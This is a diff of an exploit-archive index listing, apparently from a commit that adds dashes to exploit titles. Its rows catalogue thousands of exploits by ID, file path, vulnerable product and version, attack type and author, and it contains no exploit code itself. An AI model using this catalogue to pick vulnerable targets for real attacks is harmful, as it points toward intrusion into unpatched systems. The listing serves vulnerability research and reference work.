27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 Comentarios.php SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 -27139,platforms/php/webapps/27139.txt,"My Little Homepage Products BBCode Link Tag Script Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 +27139,platforms/php/webapps/27139.txt,"My Little Homepage Products - BBCode Link Tag Script Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27140,platforms/multiple/dos/27140.txt,"Exiv2 - Corrupted EXIF Data Denial of Service",2006-01-26,"Maciek Wierciski",multiple,dos,0 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 - Login.ASP SQL Injection",2006-01-19,code.shell,asp,webapps,0 @@ -24299,14 +24299,14 @@ id,file,description,date,author,platform,type,port 27174,platforms/asp/webapps/27174.txt,"GA's Forum Light - Archive.ASP SQL Injection",2006-02-07,Dj_Eyes,asp,webapps,0 27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 - Index.php SQL Injection",2006-02-09,papipsycho,php,webapps,0 27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 -27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 +27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - CSRF/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 Showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 iNotes javascript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes Email Subject XSS",2006-02-10,"Jakob Balle",multiple,remote,0 -27183,platforms/php/webapps/27183.txt,"FarsiNews 2.1/2.5 show_archives.php template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 +27183,platforms/php/webapps/27183.txt,"FarsiNews 2.1/2.5 show_archives.php template Parameter Traversal - Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 -27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 folders.update.php folderid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 +27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 folders.update.php folderid Variable - Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - index.php $_SERVER['PHP_SELF'] XSS",2006-02-11,"GulfTech Security",php,webapps,0 27187,platforms/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Stored XSS",2013-07-29,drone,jsp,webapps,0 27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent XSS",2013-07-29,Vulnerability-Lab,ios,webapps,0 @@ -24319,7 +24319,7 @@ id,file,description,date,author,platform,type,port 27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion",2006-02-11,rgod,php,webapps,0 27196,platforms/multiple/dos/27196.txt,"IBM Tivoli Directory Server 6.0 - Unspecified LDAP Memory Corruption",2006-02-11,"Evgeny Legerov",multiple,dos,0 27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 -27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 +27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 readfolder.php path Variable - Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - index.php bgcol Parameter XSS",2006-02-11,zjieb,php,webapps,0 27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted File Upload",2006-02-11,zjieb,php,webapps,0 27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - Search.php Q Parameter Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 @@ -24332,7 +24332,7 @@ id,file,description,date,author,platform,type,port 27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - Header.php Pagetitle Parameter Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps,0 27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting",2006-02-13,"Micha Borrmann",php,webapps,0 27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String DoS",2006-02-14,ZwelL,multiple,dos,0 -27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple Malformed Field DoS",2006-02-14,ZwelL,multiple,dos,0 +27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple - Malformed Field DoS",2006-02-14,ZwelL,multiple,dos,0 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",multiple,dos,0 27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 - Search.php Cross-Site Scripting",2006-02-14,Citynova,php,webapps,0 27214,platforms/php/webapps/27214.txt,"DeltaScripts PHP Classifieds 6.20 Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 @@ -24354,15 +24354,15 @@ id,file,description,date,author,platform,type,port 27230,platforms/php/webapps/27230.txt,"My Blog 1.63 BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27231,platforms/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,linux,local,0 27232,platforms/hardware/dos/27232.txt,"Nokia N70 L2CAP Packets Remote Denial of Service",2006-02-15,"Pierre Betouin",hardware,dos,0 -27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 chopSAPLog.dsp fullName Variable Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 -27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 deleteSingle fullName Variable Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 -27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 adapter-index.dsp url Variable Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 +27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 chopSAPLog.dsp fullName Variable - Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 +27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 deleteSingle fullName Variable - Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 +27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 adapter-index.dsp url Variable - Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - Private.php Multiple SQL Injection",2006-02-15,imei,php,webapps,0 27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27238,platforms/php/webapps/27238.php,"DreamCost HostAdmin 3.0 - Index.php Remote File Inclusion",2006-02-16,ReZEN,php,webapps,0 27239,platforms/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 Managegroup.php SQL Injection",2006-02-16,imei,php,webapps,0 -27241,platforms/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 HTTPD Denial of Service",2006-02-16,l0om,hardware,dos,0 +27241,platforms/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,hardware,dos,0 27242,platforms/php/webapps/27242.txt,"MyBB 1.0.3 Managegroup.php Cross-Site Scripting",2006-02-16,imei,php,webapps,0 27243,platforms/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 Page.php HTML Injection",2006-02-16,federico.alice@tiscali.it,php,webapps,0 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 Text File Overwrite Weakness",2006-02-16,ReZEN,linux,remote,0 @@ -24415,10 +24415,10 @@ id,file,description,date,author,platform,type,port 27290,platforms/php/webapps/27290.txt,"WordPress Plugin Better WP Security - Stored XSS",2013-08-02,"Richard Warren",php,webapps,0 27291,platforms/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",windows,webapps,19000 27292,platforms/windows/dos/27292.py,"EchoVNC Viewer Remote DoS",2013-08-02,Z3r0n3,windows,dos,0 -27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 -27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 -27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure livelog.html Arbitrary Command Execution",2013-08-02,Metasploit,unix,remote,7443 -27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,Metasploit,windows,local,0 +27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - test_li_connection.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 +27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 +27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution",2013-08-02,Metasploit,unix,remote,7443 +27296,platforms/windows/local/27296.rb,"HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)",2013-08-02,Metasploit,windows,local,0 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (Redhat x86/x64) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,linux,local,0 27298,platforms/php/webapps/27298.txt,"Web Calendar Pro Dropbase.php SQL Injection",2006-02-23,ReZEN,php,webapps,0 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 error.php html_error_occurred Parameter XSS",2006-02-23,rgod,php,webapps,0 @@ -24486,7 +24486,7 @@ id,file,description,date,author,platform,type,port 27367,platforms/php/webapps/27367.txt,"Link Bank Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0 27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 podcast.php id Parameter SQL Injection",2006-03-07,tzitaroth,php,webapps,0 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - index.php template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 -27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 backend_settings.php language Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 +27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 backend_settings.php language Parameter Traversal - Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 deleteuser.php user Parameter XSS",2006-03-06,Retard,php,webapps,0 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 viewuser.php hits Parameter XSS",2006-03-06,Retard,php,webapps,0 27373,platforms/php/webapps/27373.txt,"TextfileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 @@ -24494,7 +24494,7 @@ id,file,description,date,author,platform,type,port 27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0 27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0 27377,platforms/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 - Format String DoS",2006-03-09,"Revnic Vasile",windows,dos,0 -27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0 +27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 Full Path Request - Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0 27380,platforms/php/webapps/27380.txt,"myBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27381,platforms/php/webapps/27381.txt,"myBloggie 2.1.2/2.1.3 delcomment.php Multiple Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 @@ -24580,8 +24580,8 @@ id,file,description,date,author,platform,type,port 27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 users_profiles.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 users_mgallery.asp usid Parameter XSS",2006-03-27,r0t,asp,webapps,0 27474,platforms/multiple/dos/27474.txt,"LibVC VCard 003 Processing Buffer Overflow",2006-03-21,trew,multiple,dos,0 -27475,platforms/php/webapps/27475.txt,"SaphpLesson 2.0 Print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 -27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0 +27475,platforms/php/webapps/27475.txt,"SaphpLesson 2.0 - Print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 +27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0 27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 mail.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 Toast.ASP Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 @@ -24652,7 +24652,7 @@ id,file,description,date,author,platform,type,port 27552,platforms/asp/webapps/27552.txt,"ISP Site Man - Admin_Login.ASP SQL Injection",2006-04-01,s3rv3r_hack3r,asp,webapps,0 27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 27554,platforms/windows/remote/27554.py,"MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,windows,remote,8080 -27555,platforms/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",2013-08-13,Metasploit,windows,remote,13838 +27555,platforms/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance - Login Buffer Overflow",2013-08-13,Metasploit,windows,remote,13838 27556,platforms/windows/remote/27556.rb,"Open-FTPD 1.2 - Arbitrary File Upload",2013-08-13,Metasploit,windows,remote,8080 27558,platforms/jsp/webapps/27558.txt,"Bugzero 4.3.1 query.jsp msg Parameter XSS",2006-04-03,r0t,jsp,webapps,0 27559,platforms/jsp/webapps/27559.txt,"Bugzero 4.3.1 edit.jsp Multiple Parameter XSS",2006-04-03,r0t,jsp,webapps,0 @@ -24672,7 +24672,7 @@ id,file,description,date,author,platform,type,port 27573,platforms/php/webapps/27573.txt,"SKForum 1.x - user.View.action userID Parameter XSS",2006-04-06,r0t,php,webapps,0 27574,platforms/php/webapps/27574.txt,"Basic Analysis and Security Engine 1.2.4 PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",php,webapps,0 27575,platforms/php/webapps/27575.txt,"MD News 1 - Admin.php SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 -27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 PNuserapi.php SQL Injection",2006-04-06,king_purba,php,webapps,0 +27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 - PNuserapi.php SQL Injection",2006-04-06,king_purba,php,webapps,0 27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5.0 Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0 27578,platforms/php/webapps/27578.txt,"Jupiter CMS 1.1.5 - Index.php Cross-Site Scripting",2006-04-07,KaDaL-X,php,webapps,0 27579,platforms/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,php,webapps,0 @@ -24702,7 +24702,7 @@ id,file,description,date,author,platform,type,port 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0 27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow",2013-08-15,Metasploit,windows,remote,80 -27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) Arbitrary File Upload",2013-08-15,Metasploit,windows,remote,8000 +27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) - Arbitrary File Upload",2013-08-15,Metasploit,windows,remote,8000 27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow",2013-08-15,Metasploit,windows,remote,80 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow",2013-08-15,Metasploit,windows,local,0 27610,platforms/php/remote/27610.rb,"Joomla Media Manager - File Upload",2013-08-15,Metasploit,php,remote,80 @@ -24794,7 +24794,7 @@ id,file,description,date,author,platform,type,port 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption",2013-09-03,kingcope,hardware,remote,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injection",2006-06-17,Liz0ziM,php,webapps,0 -28058,platforms/php/webapps/28058.txt,"Eduha Meeting Index.php Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 +28058,platforms/php/webapps/28058.txt,"Eduha Meeting Index.php - Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmuser/logon.asp XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - view_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 @@ -24804,7 +24804,7 @@ id,file,description,date,author,platform,type,port 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 EasyGallery.php Cross-Site Scripting",2006-04-20,botan,php,webapps,0 27709,platforms/php/webapps/27709.txt,"4homepages 4images 1.7 - Member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 -27710,platforms/php/webapps/27710.txt,"W2B Online Banking SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 +27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter XSS",2006-06-05,Luny,php,webapps,0 @@ -24884,7 +24884,7 @@ id,file,description,date,author,platform,type,port 27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - member.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 -27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 BBCode Script Injection",2006-04-29,r0xes,php,webapps,0 +27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,php,webapps,0 27784,platforms/php/webapps/27784.txt,"PlanetGallery Gallery_admin.php Authentication Bypass",2006-04-29,tugr@,php,webapps,0 27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion",2006-05-01,beford,php,webapps,0 27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 Mod KB_constants.php Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 @@ -24898,7 +24898,7 @@ id,file,description,date,author,platform,type,port 27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - Login.php Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps,0 27795,platforms/php/webapps/27795.txt,"zenphoto 0.9/1.0 i.php a Parameter XSS",2006-05-02,zone14,php,webapps,0 27796,platforms/php/webapps/27796.txt,"zenphoto 0.9/1.0 - index.php Multiple Parameter XSS",2006-05-02,zone14,php,webapps,0 -27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 Stats.php Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 +27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 - Stats.php Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 Viewcat.php Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - Index.php Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 @@ -24920,7 +24920,7 @@ id,file,description,date,author,platform,type,port 27817,platforms/asp/webapps/27817.txt,"CyberBuild - result.asp Multiple Parameter XSS",2006-05-03,r0t,asp,webapps,0 27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 - Index.php SQL Injection",2006-05-04,almaster,php,webapps,0 27819,platforms/php/webapps/27819.txt,"CuteNews 1.4.1 - search.php Multiple Parameter XSS",2006-05-05,NST,php,webapps,0 -27820,platforms/windows/remote/27820.txt,"Cryptomathic ActiveX Control Remote Buffer Overflow",2006-05-05,"Dennis Rand",windows,remote,0 +27820,platforms/windows/remote/27820.txt,"Cryptomathic - ActiveX Control Remote Buffer Overflow",2006-05-05,"Dennis Rand",windows,remote,0 27821,platforms/php/webapps/27821.html,"OpenFAQ 0.4 Validate.php HTML Injection",2006-05-06,"Kamil Sienicki",php,webapps,0 27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps,0 27823,platforms/php/webapps/27823.txt,"OpenEngine 1.7/1.8 Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps,0 @@ -24929,7 +24929,7 @@ id,file,description,date,author,platform,type,port 27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/view.asp SearchFor Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/edit.asp ID Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/main.asp date Parameter XSS",2006-05-08,dj_eyes2005,asp,webapps,0 -27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script Admin.php Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 +27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script - Admin.php Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 27830,platforms/hardware/remote/27830.java,"Multiple Cisco Products - WebSense Content Filtering Bypass",2006-05-08,"George D. Gal",hardware,remote,0 27831,platforms/php/webapps/27831.txt,"Creative Software UK Community Portal 1.1 ArticleView.php article_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27832,platforms/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 DiscView.php forum_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 @@ -24939,7 +24939,7 @@ id,file,description,date,author,platform,type,port 27836,platforms/php/webapps/27836.txt,"Creative Software UK Community Portal 1.1 DiscReply.php mid Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27837,platforms/php/webapps/27837.txt,"EvoTopsite 2.0 - Index.php Multiple SQL Injection",2006-05-08,"Hamid Ebadi",php,webapps,0 27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - index.php pfad Variable Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 -27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 galerie.php pfad Variable Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 +27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 galerie.php pfad Variable - Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 27840,platforms/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - index.php pfad Parameter XSS",2006-05-08,d4igoro,php,webapps,0 27841,platforms/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 galerie.php id Parameter XSS",2006-05-08,d4igoro,php,webapps,0 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.ASP SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 @@ -24974,7 +24974,7 @@ id,file,description,date,author,platform,type,port 27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0 27875,platforms/linux/dos/27875.c,"libtiff 3.9.5 - Integer Overflow",2013-08-26,x90c,linux,dos,0 27876,platforms/php/webapps/27876.txt,"Musicbox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0 -27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server Remote Command Execution",2013-08-26,Metasploit,windows,remote,7770 +27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server - Remote Command Execution",2013-08-26,Metasploit,windows,remote,7770 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0 27879,platforms/php/webapps/27879.txt,"Joomla! VirtueMart Component 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - Popup.php Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0 @@ -24997,14 +24997,14 @@ id,file,description,date,author,platform,type,port 27897,platforms/asp/webapps/27897.txt,"ASPBB 0.5.2 profile.asp get Parameter XSS",2006-05-18,TeufeL,asp,webapps,0 27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - Default.ASP SQL Injection",2006-05-19,omnipresent,asp,webapps,0 27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 DC.php SQL Injection",2006-05-19,Luny,php,webapps,0 -27900,platforms/php/webapps/27900.txt,"Artmedic Newsletter 4.1 Log.php Remote Script Execution",2006-05-19,C.Schmitz,php,webapps,0 +27900,platforms/php/webapps/27900.txt,"Artmedic Newsletter 4.1 - Log.php Remote Script Execution",2006-05-19,C.Schmitz,php,webapps,0 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 Nested Array Objects Denial of 